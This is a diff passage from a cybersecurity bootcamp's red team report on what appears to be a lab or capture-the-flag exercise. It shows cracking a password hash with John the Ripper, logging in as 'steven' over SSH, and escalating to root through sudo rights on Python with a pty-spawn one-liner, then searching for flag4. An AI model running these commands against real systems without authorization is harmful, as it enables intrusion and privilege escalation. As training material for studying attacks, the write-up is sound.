chrismah/UoT-Cybersecurity-Bootcamp/Final Project/Red Team Report.md

 $ john hash.txt
 ```
 ![john hash](images/john_hash.png)
+After cracking the password we were able to login as `steven`
 ```
 $ ssh steven@192.168.1.110
 ```
+When checking `steven`'s privileges we noticed he has sudo access to `/usr/bin/python`
 ```
 $ sudo -l
 ```
 ![steven_sudo](images/sudo.png)
+With this we were able to escalate to root
 ```
 $ sudo python -c 'import pty;pty.spawn("/bin/bash")'
 ```
+Finally running the following command for `flag4`
 ```
 $ find / -iname "flag4*" 2> /dev/null
 ```